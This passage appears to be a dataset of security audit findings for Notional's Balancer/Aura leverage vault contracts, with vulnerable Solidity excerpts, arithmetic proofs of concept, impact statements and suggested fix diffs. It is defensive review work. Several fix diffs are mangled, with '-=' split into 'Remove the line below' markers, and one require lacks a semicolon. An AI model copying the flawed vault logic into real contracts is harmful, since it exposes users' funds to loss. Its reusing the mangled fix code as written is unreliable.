returned by the `_redeem` function. Thus, it will consider the small number of `strategyTokens` to be redeemed. Note that the `_redeemFromNotional` function calls the `_redeem` function under the hood.\\n```\\nFile: BaseStrategyVault.sol\\n function redeemFromNotional(\\n address account,\\n address receiver,\\n uint256 strategyTokens,\\n uint256 maturity,\\n uint256 underlyingToRepayDebt,\\n bytes calldata data\\n ) external onlyNotional returns (uint256 transferToReceiver) {\\n uint256 borrowedCurrencyAmount = _redeemFromNotional(account, strategyTokens, maturity, data);\\n\\n uint256 transferToNotional;\\n if (account == address(this) || borrowedCurrencyAmount <= underlyingToRepayDebt) {\\n // It may be the case that insufficient tokens were redeemed to repay the debt. If this\\n // happens the Notional will attempt to recover the shortfall from the account directly.\\n // This can happen if an account wants to reduce their leverage by paying off debt but\\n // does not want to sell strategy tokens to do so.\\n // The other situation would be that the vault is calling redemption to deleverage or\\n // settle. 
In that case all tokens go back to Notional.\\n transferToNotional = borrowedCurrencyAmount;\\n } else {\\n transferToNotional = underlyingToRepayDebt;\\n unchecked { transferToReceiver = borrowedCurrencyAmount - underlyingToRepayDebt; }\\n }\\n\\n if (_UNDERLYING_IS_ETH) {\\n if (transferToReceiver > 0) payable(receiver).transfer(transferToReceiver);\\n if (transferToNotional > 0) payable(address(NOTIONAL)).transfer(transferToNotional);\\n } else {\\n if (transferToReceiver > 0) _UNDERLYING_TOKEN.checkTransfer(receiver, transferToReceiver);\\n if (transferToNotional > 0) _UNDERLYING_TOKEN.checkTransfer(address(NOTIONAL), transferToNotional);\\n }\\n }\\n```\\n\\nSubsequently, on Notional side, it will deduct the redeemed strategy tokens from its vaultState.totalStrategyTokens state (Refer to Line 177 below)\\n```\\nFile: VaultAction.sol\\n /// @notice Redeems strategy tokens to cash\\n function _redeemStrategyTokensToCashInternal(\\n VaultConfig memory vaultConfig,\\n uint256 maturity,\\n uint256 strategyTokensToRedeem,\\n bytes calldata vaultData\\n ) private nonReentrant returns (int256 assetCashRequiredToSettle, int256 underlyingCashRequiredToSettle) {\\n // If the vault allows further re-entrancy then set the status back to the default\\n if (vaultConfig.getFlag(VaultConfiguration.ALLOW_REENTRANCY)) {\\n reentrancyStatus = _NOT_ENTERED;\\n }\\n\\n VaultState memory vaultState = VaultStateLib.getVaultState(vaultConfig.vault, maturity);\\n (int256 assetCashReceived, uint256 underlyingToReceiver) = vaultConfig.redeemWithoutDebtRepayment(\\n vaultConfig.vault, strategyTokensToRedeem, maturity, vaultData\\n );\\n require(assetCashReceived > 0);\\n // Safety check to ensure that the vault does not somehow receive tokens in this scenario\\n require(underlyingToReceiver == 0);\\n\\n vaultState.totalAssetCash = vaultState.totalAssetCash.add(uint256(assetCashReceived));\\n vaultState.totalStrategyTokens = vaultState.totalStrategyTokens.sub(strategyTokensToRedeem);\\n 
vaultState.setVaultState(vaultConfig.vault);\\n\\n emit VaultRedeemStrategyToken(vaultConfig.vault, maturity, assetCashReceived, strategyTokensToRedeem);\\n return _getCashRequiredToSettle(vaultConfig, vaultState, maturity);\\n }\\n```\\n\\nHowever, the main issue is that when a small number of `strategyTokens` are redeemed and `bptClaim` is zero, the `_redeem` function will exit at Line 441 immediately. Thus, the redeemed strategy tokens are not deducted from the `strategyContext.vaultState.totalStrategyTokenGlobal` accounting variable on the Vault side.\\nThus, `strategyContext.vaultState.totalStrategyTokenGlobal` on the Vault side will not be in sync with the `vaultState.totalStrategyTokens` on the Notional side.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n ) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\n","The number of strategy tokens redeemed needs to be deducted from the vault's `totalStrategyTokenGlobal` regardless of the `bptClaim` value. Otherwise, the vault's `totalStrategyTokenGlobal` will not be in sync.\\nWhen `bptClaim` is zero, it does not always mean that no strategy token has been redeemed. 
Based on the current vault implementation, the `bptClaim` might be zero because the number of strategy tokens to be redeemed is too small and thus it causes Solidity to round down to zero.\\n```\\nfunction _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n// Add the line below\\n strategyContext.vaultState.totalStrategyTokenGlobal // Remove the line below\\n= strategyTokens.toUint80();\\n// Add the line below\\n strategyContext.vaultState.setStrategyVaultState();\\n// Add the line below\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld // Remove the line below\\n= bptClaim;\\n// Remove the line below\\n strategyContext.vaultState.totalStrategyTokenGlobal // Remove the line below\\n= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n","The `strategyContext.vaultState.totalStrategyTokenGlobal` variable that tracks the number of strategy tokens held in the vault will not be in sync and will cause accounting issues within the vault. This means that the actual total strategy tokens in circulation and the `strategyContext.vaultState.totalStrategyTokenGlobal` will be different. 
The longer the issue is left unfixed, the larger the differences between them.\\nThe `strategyContext.vaultState.totalStrategyTokenGlobal` will be larger than expected because it does not deduct the number of strategy tokens when it should be under certain conditions.\\nOne example of the impact is as follows: The affected variable is used within the `_convertStrategyTokensToBPTClaim` and `_convertBPTClaimToStrategyTokens`, `_getBPTHeldInMaturity` functions. These functions are used within the deposit and redeem functions of the vault. Therefore, the number of strategy tokens or assets the users receive will not be accurate and might be less or more than expected.","```\\nFile: StrategyUtils.sol\\n /// @notice Converts strategy tokens to BPT\\n function _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.vaultState.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n }\\n```\\n" +Token amounts are scaled up twice causing the amounts to be inflated in two token vault,high,"Token amounts are scaled up twice causing the amounts to be inflated in two token vault when performing computation. This in turn causes the reinvest function to break leading to a loss of assets for vault users, and the value of their strategy tokens will be struck and will not appreciate.\\nIn Line 121-124, the `primaryAmount` and `secondaryAmount` are scaled up to `BALANCER_PRECISION` (1e18). 
The reason for doing so is that balancer math functions expect all amounts to be in `BALANCER_PRECISION` (1e18).\\nThen, the scaled `primaryAmount` and `secondaryAmount` are passed into the `_getSpotPrice` function at Line 126.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _validateSpotPriceAndPairPrice(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 primaryAmount, \\n uint256 secondaryAmount\\n ) internal view {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check spotPrice against oracle price to make sure that \\n /// the pool is not being manipulated\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n\\n /// @notice Balancer math functions expect all amounts to be in BALANCER_PRECISION\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n primaryAmount = primaryAmount * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n secondaryAmount = secondaryAmount * BalancerConstants.BALANCER_PRECISION / secondaryPrecision;\\n\\n uint256 calculatedPairPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: primaryAmount,\\n secondaryBalance: secondaryAmount,\\n tokenIndex: 0\\n });\\n```\\n\\nWithin the `_getSpotPrice` function, the `primaryBalance` and `secondaryBalance` are scaled up again at Line 25 - 28. As such, any token (e.g. USDC) with a decimal of less than `BALANCER_PRECISION` (1e18) will be scaled up twice. 
This will cause the `balanceX` or `balanceY` to be inflated.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 primaryBalance,\\n uint256 secondaryBalance,\\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n require(tokenIndex < 2); /// @dev invalid token index\\n\\n /// Apply scale factors\\n uint256 scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n uint256 scaledSecondaryBalance = secondaryBalance * poolContext.secondaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n\\n /// @notice poolContext balances are always in BALANCER_PRECISION (1e18)\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (scaledPrimaryBalance, scaledSecondaryBalance) :\\n (scaledSecondaryBalance, scaledPrimaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX,\\n balanceY: balanceY\\n });\\n\\n /// Apply secondary scale factor in reverse\\n uint256 scaleFactor = tokenIndex == 0 ?\\n poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor :\\n poolContext.primaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.secondaryScaleFactor;\\n spotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\n }\\n```\\n\\nBalancer's Scaling Factors\\nIt is important to know the underlying mechanism of scaling factors within Balancer to understand this issue.\\nWithin Balancer, all stable math calculations within the Balancer's pools are performed in 1e18. 
Thus, before passing the token balances to the stable math functions, all the balances need to be normalized to 18 decimals.\\nFor instance, assume that 100 USDC needs to be passed into the stable math functions for some computation. 100 USDC is equal to `100e6` since the decimals of USDC is `6`. To normalize it to 18 decimals, 100 USDC (100e6) will be multiplied by its scaling factor (1e12), and the result will be `100e18`.\\nThe following code taken from Balancer shows that the scaling factor is comprised of the scaling factor multiplied by the token rate. The scaling factor is the value needed to normalize the token balance to 18 decimals.\\n```\\n /**\\n * @dev Overrides scaling factor getter to introduce the tokens' price rate.\\n * Note that it may update the price rate cache if necessary.\\n */\\n function _scalingFactors() internal view virtual override returns (uint256[] memory scalingFactors) {\\n // There is no need to check the arrays length since both are based on `_getTotalTokens`\\n // Given there is no generic direction for this rounding, it simply follows the same strategy as the BasePool.\\n scalingFactors = super._scalingFactors();\\n scalingFactors[0] = scalingFactors[0].mulDown(_priceRate(_token0));\\n scalingFactors[1] = scalingFactors[1].mulDown(_priceRate(_token1));\\n }\\n```\\n\\nAnother point to note is that Balancer's stable math functions perform calculations in fixed point format. Therefore, the scaling factor will consist of the `FixedPoint.ONE` (1e18) multiplied by the value needed to normalize the token balance to 18 decimals. 
If it is a USDC with 6 decimals, the scaling factor will be 1e30:\\n```\\nFixedPoint.ONE * 10**decimalsDifference\\n1e18 * 1e12 = 1e30\\n```\\n\\n```\\n /**\\n * @dev Returns a scaling factor that, when multiplied to a token amount for `token`, normalizes its balance as if\\n * it had 18 decimals.\\n */\\n function _computeScalingFactor(IERC20 token) internal view returns (uint256) {\\n // Tokens that don't implement the `decimals` method are not supported.\\n uint256 tokenDecimals = ERC20(address(token)).decimals();\\n\\n // Tokens with more than 18 decimals are not supported.\\n uint256 decimalsDifference = Math.sub(18, tokenDecimals);\\n return FixedPoint.ONE * 10**decimalsDifference;\\n }\\n```\\n\\nProof-of-Concept\\nAssume that one of the tokens in Notional's two token leverage vault has a decimal of less than 18. Let's take USDC as an example.\\n100 USDC (1e6) is passed into the `_validateSpotPriceAndPairPrice` function as the `primaryAmount`. In Line 121-124 of the `_validateSpotPriceAndPairPrice` function, the `primaryAmount` will be scaled up to `BALANCER_PRECISION` (1e18).\\n`primaryAmount` = `primaryAmount` * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n`primaryAmount` = 100e6 * 1e18 / 1e6\\n`primaryAmount` = 100e18\\nWithin the `_getSpotPrice` function, the `primaryBalance` is scaled up again at Line 25 - 28 of the `_getSpotPrice` function.\\n`scaledPrimaryBalance = `primaryBalance` * poolContext.primaryScaleFactor / BalancerConstants.BALANCER_PRECISION;\\nscaledPrimaryBalance = 100e18 * 1e30 / 1e18\\nscaledPrimaryBalance = 1e30\\nscaledPrimaryBalance = 1000000000000e18`\\nAs shown above, normalized 100 USDC (100e18) ended up becoming normalized 1000000000000 USDC (1000000000000e18). 
Therefore, the stable math functions are computed with an inflated balance of 1000000000000 USDC instead of 100 USDC.","Since the token balances are already normalized to 18 decimals within the `_getSpotPrice` function, the code to normalize the token balances in the `_validateSpotPriceAndPairPrice` function can be removed.\\n```\\n function _validateSpotPriceAndPairPrice(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 primaryAmount, \\n uint256 secondaryAmount\\n ) internal view {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check spotPrice against oracle price to make sure that \\n /// the pool is not being manipulated\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n\\n// Remove the line below\\n /// @notice Balancer math functions expect all amounts to be in BALANCER_PRECISION\\n// Remove the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Remove the line below\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n// Remove the line below\\n primaryAmount = primaryAmount * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n// Remove the line below\\n secondaryAmount = secondaryAmount * BalancerConstants.BALANCER_PRECISION / secondaryPrecision;\\n\\n uint256 calculatedPairPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: primaryAmount,\\n secondaryBalance: secondaryAmount,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check the calculated primary/secondary price against the oracle price\\n /// to make sure that we are joining the pool 
proportionally\\n _checkPriceLimit(strategyContext, oraclePrice, calculatedPairPrice);\\n }\\n```\\n","The spot price computed by the `Stable2TokenOracleMath._getSpotPrice` function will deviate from the actual price because inflated balances were passed into it. The deviated spot price will then be passed to the `_checkPriceLimit` function to verify if the spot price has deviated from the oracle price. The check will fail and cause a revert. This will in turn cause the `Stable2TokenOracleMath._validateSpotPriceAndPairPrice` function to revert.\\nTherefore, any function that relies on the `Stable2TokenOracleMath._validateSpotPriceAndPairPrice` function will be affected. It was found that the `MetaStable2TokenAuraHelper.reinvestReward` relies on the `Stable2TokenOracleMath._validateSpotPriceAndPairPrice` function. As such, reinvest feature of the vault will be broken and the vault will not be able to reinvest its rewards.\\nThis in turn led to a loss of assets for vault users, and the value of their strategy tokens will be struck and will not appreciate.","```\\nFile: Stable2TokenOracleMath.sol\\n function _validateSpotPriceAndPairPrice(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 primaryAmount, \\n uint256 secondaryAmount\\n ) internal view {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check spotPrice against oracle price to make sure that \\n /// the pool is not being manipulated\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n\\n /// @notice Balancer math functions expect all amounts to be in BALANCER_PRECISION\\n uint256 primaryPrecision = 
10 ** poolContext.primaryDecimals;\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n primaryAmount = primaryAmount * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n secondaryAmount = secondaryAmount * BalancerConstants.BALANCER_PRECISION / secondaryPrecision;\\n\\n uint256 calculatedPairPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: primaryAmount,\\n secondaryBalance: secondaryAmount,\\n tokenIndex: 0\\n });\\n```\\n" +`msgValue` will not be populated if ETH is the secondary token,high,"`msgValue` will not be populated if ETH is the secondary token in the two token leverage vault, leading to a loss of assets as the ETH is not forwarded to the Balancer Pool during a trade.\\nBased on the source code of the two token pool leverage vault, it is possible to deploy a vault to support a Balancer pool with an arbitrary token as the primary token and ETH as the secondary token. The primary token is always the borrowing currency in the vault.\\nHowever, Line 60 of `TwoTokenPoolUtils._getPoolParams` function below assumes that if one of the two tokens is ETH in the pool, it will always be the primary token or borrowing currency, which is not always the case. 
If the ETH is set as the secondary token, the `msgValue` will not be populated.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Returns parameters for joining and exiting Balancer pools\\n function _getPoolParams(\\n TwoTokenPoolContext memory context,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isJoin\\n ) internal pure returns (PoolParams memory) {\\n IAsset[] memory assets = new IAsset[](2);\\n assets[context.primaryIndex] = IAsset(context.primaryToken);\\n assets[context.secondaryIndex] = IAsset(context.secondaryToken);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[context.primaryIndex] = primaryAmount;\\n amounts[context.secondaryIndex] = secondaryAmount;\\n\\n uint256 msgValue;\\n if (isJoin && assets[context.primaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n msgValue = amounts[context.primaryIndex];\\n }\\n\\n return PoolParams(assets, amounts, msgValue);\\n }\\n```\\n\\nAs a result, when the caller joins the Balancer pool, the `params.msgValue` will be empty, and no secondary token (ETH) will be forwarded to the Balancer pool. 
The ETH will remain stuck in the vault and the caller will receive much fewer BPT tokens in return.\\n```\\nFile: BalancerUtils.sol\\n /// @notice Joins a balancer pool using exact tokens in\\n function _joinPoolExactTokensIn(\\n PoolContext memory context,\\n PoolParams memory params,\\n uint256 minBPT\\n ) internal returns (uint256 bptAmount) {\\n bptAmount = IERC20(address(context.pool)).balanceOf(address(this));\\n Deployments.BALANCER_VAULT.joinPool{value: params.msgValue}(\\n context.poolId,\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest(\\n params.assets,\\n params.amounts,\\n abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n params.amounts,\\n minBPT // Apply minBPT to prevent front running\\n ),\\n false // Don't use internal balances\\n )\\n );\\n bptAmount =\\n IERC20(address(context.pool)).balanceOf(address(this)) -\\n bptAmount;\\n }\\n```\\n","Consider populating the `msgValue` if the secondary token is ETH.\\n```\\n/// @notice Returns parameters for joining and exiting Balancer pools\\nfunction _getPoolParams(\\n TwoTokenPoolContext memory context,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isJoin\\n) internal pure returns (PoolParams memory) {\\n IAsset[] memory assets = new IAsset[](2);\\n assets[context.primaryIndex] = IAsset(context.primaryToken);\\n assets[context.secondaryIndex] = IAsset(context.secondaryToken);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[context.primaryIndex] = primaryAmount;\\n amounts[context.secondaryIndex] = secondaryAmount;\\n\\n uint256 msgValue;\\n if (isJoin && assets[context.primaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n msgValue = amounts[context.primaryIndex];\\n }\\n// Add the line below\\n if (isJoin && assets[context.secondaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n// Add the line below\\n msgValue = amounts[context.secondaryIndex];\\n// Add the line below\\n }\\n \\n return PoolParams(assets, amounts, 
msgValue);\\n}\\n```\\n","Loss of assets for the callers as ETH will remain stuck in the vault and not forwarded to the Balancer Pool. Since the secondary token (ETH) is not forwarded to the Balancer pool, the caller will receive much fewer BPT tokens in return when joining the pool.\\nThis issue affects the deposit and reinvest reward functions of the vault, which means that the depositor will receive fewer strategy tokens in return during depositing, and the vault will receive less BPT in return during reinvesting.","```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Returns parameters for joining and exiting Balancer pools\\n function _getPoolParams(\\n TwoTokenPoolContext memory context,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isJoin\\n ) internal pure returns (PoolParams memory) {\\n IAsset[] memory assets = new IAsset[](2);\\n assets[context.primaryIndex] = IAsset(context.primaryToken);\\n assets[context.secondaryIndex] = IAsset(context.secondaryToken);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[context.primaryIndex] = primaryAmount;\\n amounts[context.secondaryIndex] = secondaryAmount;\\n\\n uint256 msgValue;\\n if (isJoin && assets[context.primaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n msgValue = amounts[context.primaryIndex];\\n }\\n\\n return PoolParams(assets, amounts, msgValue);\\n }\\n```\\n" +`totalBPTSupply` will be excessively inflated,high,"The `totalBPTSupply` will be excessively inflated as `totalSupply` was used instead of `virtualSupply`. This might cause a boosted balancer leverage vault not to be emergency settled in a timely manner and holds too large of a share of the liquidity within the pool, thus having problems exiting its position.\\nBalancer's Boosted Pool uses Phantom BPT where all pool tokens are minted at the time of pool creation and are held by the pool itself. 
Therefore, `virtualSupply` should be used instead of `totalSupply` to determine the amount of BPT supply in circulation.\\nHowever, within the `Boosted3TokenAuraVault.getEmergencySettlementBPTAmount` function, the `totalBPTSupply` at Line 169 is derived from the `totalSupply` instead of the `virtualSupply`. As a result, `totalBPTSupply` will be excessively inflated (2**(111)).\\n```\\nFile: Boosted3TokenAuraVault.sol\\n function getEmergencySettlementBPTAmount(uint256 maturity) external view returns (uint256 bptToSettle) {\\n Boosted3TokenAuraStrategyContext memory context = _strategyContext();\\n bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n maturity: maturity, \\n totalBPTSupply: IERC20(context.poolContext.basePool.basePool.pool).totalSupply()\\n });\\n }\\n```\\n\\nAs a result, the `emergencyBPTWithdrawThreshold` threshold will be extremely high. As such, the condition at Line 97 will always be evaluated as true and result in a revert.\\n```\\nFile: SettlementUtils.sol\\n function _getEmergencySettlementParams(\\n StrategyContext memory strategyContext,\\n uint256 maturity,\\n uint256 totalBPTSupply\\n ) internal view returns(uint256 bptToSettle) {\\n StrategyVaultSettings memory settings = strategyContext.vaultSettings;\\n StrategyVaultState memory state = strategyContext.vaultState;\\n\\n // Not in settlement window, check if BPT held is greater than maxBalancerPoolShare * total BPT supply\\n uint256 emergencyBPTWithdrawThreshold = settings._bptThreshold(totalBPTSupply);\\n\\n if (strategyContext.vaultState.totalBPTHeld <= emergencyBPTWithdrawThreshold)\\n revert Errors.InvalidEmergencySettlement();\\n```\\n\\n```\\nFile: BalancerVaultStorage.sol\\n function _bptThreshold(StrategyVaultSettings memory strategyVaultSettings, uint256 totalBPTSupply)\\n internal pure returns (uint256) {\\n return (totalBPTSupply * strategyVaultSettings.maxBalancerPoolShare) / BalancerConstants.VAULT_PERCENT_BASIS;\\n }\\n```\\n","Update the function to 
compute the `totalBPTSupply` from the virtual supply.\\n```\\n function getEmergencySettlementBPTAmount(uint256 maturity) external view returns (uint256 bptToSettle) {\\n Boosted3TokenAuraStrategyContext memory context = _strategyContext();\\n bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n maturity: maturity, \\n// Remove the line below\\n totalBPTSupply: IERC20(context.poolContext.basePool.basePool.pool).totalSupply()\\n// Add the line below\\n totalBPTSupply: context.poolContext._getVirtualSupply(context.oracleContext)\\n });\\n }\\n```\\n","Anyone (e.g. off-chain keeper or bot) that relies on the `SettlementUtils.getEmergencySettlementBPTAmount` to determine if an emergency settlement is needed would be affected. The caller will presume that since the function reverts, emergency settlement is not required and the BPT threshold is still within the healthy level. The caller will wrongly decided not to perform an emergency settlement on a vault that has already exceeded the BPT threshold.\\nIf a boosted balancer leverage vault is not emergency settled in a timely manner and holds too large of a share of the liquidity within the pool, it will have problems exiting its position.","```\\nFile: Boosted3TokenAuraVault.sol\\n function getEmergencySettlementBPTAmount(uint256 maturity) external view returns (uint256 bptToSettle) {\\n Boosted3TokenAuraStrategyContext memory context = _strategyContext();\\n bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n maturity: maturity, \\n totalBPTSupply: IERC20(context.poolContext.basePool.basePool.pool).totalSupply()\\n });\\n }\\n```\\n" +Users redeem strategy tokens but receives no assets in return,high,"Due to a rounding error in Solidity, it is possible that a user burns their strategy tokens, but receives no assets in return due to issues in the following functions:\\nStrategyUtils._convertStrategyTokensToBPTClaim\\nBoosted3TokenPoolUtils._redeem\\nTwoTokenPoolUtils._redeem\\nThis 
affects both the TwoToken and Boosted3Token vaults\\n```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n\\nWithin the `StrategyUtils._convertStrategyTokensToBPTClaim` function, it was observed that if the numerator is smaller than the denominator, the `bptClaim` will be zero.\\n```\\nFile: StrategyUtils.sol\\n function _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.vaultState.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n }\\n```\\n\\nWhen the `bptClaim` is zero, the function returns zero instead of reverting. Therefore, it is possible that a user redeems (""burns"") their strategy tokens, but receives no assets in return because the number of strategy tokens redeemed by the user is too small.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n ) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\n","Consider reverting if the assets (bptClaim) received is zero. 
This check has been implemented in many well-known vault designs as this is a commonly known issue (e.g. Solmate)\\n```\\nfunction _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n// Remove the line below\\n if (bptClaim == 0) return 0;\\n// Add the line below\\n require(bptClaim > 0, ""zero asset"")\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld // Remove the line below\\n= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal // Remove the line below\\n= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n","Loss of assets for the users as they burn their strategy tokens, but receive no assets in return.",```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n +Scaling factor of the wrapped token is incorrect,high,"The scaling factor of the wrapped token within the Boosted3Token leverage vault is incorrect. Thus, all the computations within the leverage vault will be incorrect. 
